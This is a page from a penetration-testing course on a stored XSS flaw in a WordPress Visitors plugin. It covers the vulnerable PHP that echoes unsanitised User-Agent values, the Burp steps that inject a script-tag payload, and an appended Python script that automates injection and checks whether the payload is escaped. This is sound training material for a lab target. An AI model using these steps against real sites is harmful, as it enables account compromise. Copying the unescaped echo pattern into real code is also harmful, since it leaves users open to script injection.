Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
237
Listing 121 - Inspecting Visitor Plugin Record Creation Function
This PHP function is responsible for parsing various HTTP request headers, including the User-Agent, which is saved in the useragent record value.
Next, each time a WordPress administrator loads the Visitor plugin, the function will execute the
following portion of code from start.php:
// Emit one table row per stored visitor record, numbering them down from the total.
// Every column is built by plain string concatenation into the HTML, and the
// useragent column is attacker-controlled. The host part of the IP lookup link
// in the href was lost in extraction and is shown as "...".
$i=count(VST_get_records($date_start, $date_finish));
foreach(VST_get_records($date_start, $date_finish) as $record) {
    echo '<tr>
        <td>'.$i.'</td>
        <td>'.date_format(date_create($record->datetime), get_option("links_updated_date_format")).'</td>
        <td>'.$record->patch.'</td>
        <td><a href="...'.$record->ip.'#ipresult">'.$record->ip.'</a></td>
        <td>'.$record->useragent.'</td>
    </tr>';
    $i--;
}
Listing 122 - Inspecting Visitors Plugin Record Visualization Function
From the above code, we'll notice that the useragent record value is retrieved from the database and inserted plainly in the Table Data (td) HTML tag, without any sort of data sanitization.
As the User-Agent header is under user control, we could craft an XSS attack by inserting a script tag invoking the alert() method to generate a pop-up message. Given the immediate visual impact, this method is very commonly used to verify that an application is vulnerable to XSS. Because the value is stored and only rendered when an administrator opens the plugin page, this is a stored XSS that fires in the admin's browser, not in ours.
Although we just performed a white-box testing approach, we could have discovered the same vulnerability by testing the plugin through black-box HTTP header fuzzing: send requests with a marker payload in each header and then look for it, unescaped, in the pages that display visitor data.
With Burp configured as a proxy and Intercept disabled, we can start our attack by first browsing to http://offsecwp/ using Firefox. We'll then go to Burp Proxy > HTTP History, right-click on the request, and select Send to Repeater.
Figure 113: Forwarding the request to the Repeater
If the server responds with a 200 OK message, the front-end request was served and our payload should now be stored in the WordPress database. The status code alone does not prove that the User-Agent was recorded or that it will be rendered unescaped, so we verify this directly: let's log in to the admin console at http://offsecwp/wp-login.php using the admin/password credentials.
If we navigate to the Visitors plugin console at http://offsecwp/wp-admin/admin.php?page=visitors-app%2Fadmin%2Fstart.php, we are greeted with a pop-up banner showing the number 42, proving that our code injection worked.
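The black-box header test mentioned earlier and the inject-then-verify steps just described can be scripted, which helps when re-testing after a fix or when many plugins are being checked. The following Python script is an added example and is not part of the PWK text or of the Visitors plugin. It assumes the http://offsecwp target and admin/password credentials from the text, that wp-login.php accepts the standard log/pwd/testcookie form fields, and that the plugin records the User-Agent of every front-end request. The sample HTML rows it is checked against are constructed for the example, not captured from a target.

```python
"""Scripted stored-XSS check for the Visitors plugin (added example).

Assumptions (not from the original page): target URL, WordPress login
form field names, and that every front-end request is recorded.
"""
import html
import http.cookiejar
import urllib.parse
import urllib.request

TARGET = "http://offsecwp"
LOGIN_PAGE = TARGET + "/wp-login.php"
ADMIN_PAGE = TARGET + "/wp-admin/admin.php?page=visitors-app%2Fadmin%2Fstart.php"

# A marker value (42, as in the text) lets us tell our own record apart
# from genuine visitors when we read the admin page back.
PAYLOAD = "<script>alert(42)</script>"

# Constructed sample rows, not real captures: one as the vulnerable sink
# renders it, one as a sink using esc_html()/htmlspecialchars() would.
SAMPLE_VULNERABLE = '<tr><td>1</td><td>127.0.0.1</td><td><script>alert(42)</script></td></tr>'
SAMPLE_ESCAPED = '<tr><td>1</td><td>127.0.0.1</td><td>&lt;script&gt;alert(42)&lt;/script&gt;</td></tr>'


def check_reflection(page_html: str, payload: str = PAYLOAD) -> str:
    """Classify how the stored header came back in the admin page.

    "raw"     - payload present verbatim: the sink does not encode it (stored XSS)
    "escaped" - only an entity-encoded copy is present (sink is safe)
    "absent"  - not found: request not stored, or the value was filtered earlier
    """
    if payload in page_html:
        return "raw"
    # PHP encodes a single quote as &#039; where Python uses &#x27;, so
    # normalise before comparing, and also accept the no-quotes form.
    php_style = html.escape(payload, quote=True).replace("&#x27;", "&#039;")
    if php_style in page_html or html.escape(payload, quote=False) in page_html:
        return "escaped"
    return "absent"


def build_opener() -> urllib.request.OpenerDirector:
    """One opener with a cookie jar so the login session persists across calls."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))


def inject(opener, payload: str = PAYLOAD) -> int:
    """Send one front-end request whose User-Agent is the payload; return the HTTP status.

    A 200 only says the page was served; storage is confirmed by check_reflection().
    """
    req = urllib.request.Request(TARGET + "/", headers={"User-Agent": payload})
    with opener.open(req) as resp:
        return resp.status


def login(opener, user: str, password: str) -> None:
    """Log in to WordPress. The GET first collects the test cookie wp-login.php expects."""
    opener.open(LOGIN_PAGE).close()
    form = {"log": user, "pwd": password, "testcookie": "1", "wp-submit": "Log In"}
    opener.open(LOGIN_PAGE, data=urllib.parse.urlencode(form).encode()).close()


def fetch_admin_page(opener) -> str:
    """Load the plugin's visitor table as the administrator would."""
    with opener.open(ADMIN_PAGE) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    op = build_opener()
    print("front-end request status:", inject(op))
    login(op, "admin", "password")
    print("payload in admin page:", check_reflection(fetch_admin_page(op)))
```

check_reflection() separates the verbatim payload from the entity-encoded form that a sink wrapped in esc_html() or htmlspecialchars() would produce, so the same script reports when a fix has landed rather than just failing silently. A "raw" result is strong evidence, but confirm it in a browser as the text does: the literal string could also appear inside some other script block on the page without being the plugin's output.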